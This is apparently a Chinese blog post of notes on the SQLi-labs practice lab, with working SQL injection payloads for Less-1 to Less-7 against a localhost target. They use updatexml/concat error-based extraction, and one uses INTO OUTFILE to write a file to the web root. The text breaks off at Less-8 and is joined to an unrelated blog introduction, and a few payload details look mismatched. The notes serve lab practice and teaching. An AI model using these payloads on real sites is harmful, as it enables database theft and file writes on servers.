SQLi-labs笔记

less-1 单引号报错注入,无回显位,利用一些函数,这里附上一个老毛子的链接:http://blackfan.ru/mysql_game/ payload:http://localhost/sqli-labs/Less-1/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-2 整数型报错注入,无回显位,同上 payload:http://localhost/sqli-labs/Less-2/?id=1+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-3 有单括号加单引号的报错注入,无回显位,利用同上 payload:http://localhost/sqli-labs/Less-3/?id=1′)+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-4 有单括号加双引号的报错注入,无回显位,利用同上: payload:http://localhost/sqli-labs/Less-4/?id=1″)+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-5 同less-1一样 payload:http://localhost/sqli-labs/Less-5/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23 less-6 同less-2一样 payload:http://localhost/sqli-labs/Less-6/?id=1’+union+select+updatexml(0,concat(0x3c,version()),0)%23   less-7 无回显,无报错信息,根据题目信息使用loadfile,但是由于本地权限限制,写不了文件,这里给出payload: payload:http://localhost/sqli-labs/Less-6/?id=1’+union+select+1,2,3+into+outfile+”/var/www/html/sqli-labs/test.txt”–+   less-8  

写在最开始

自己网站的主站一直都没有做东西,blog.ikow.cn这个域名一直当做技术博客,记录一些技术上遇到的问题。但是随着自己看了一些书、文章、站点,发现很多很有意思的东西,想找个地方记录下来。这些不仅仅包括计算机、信息安全、互联网。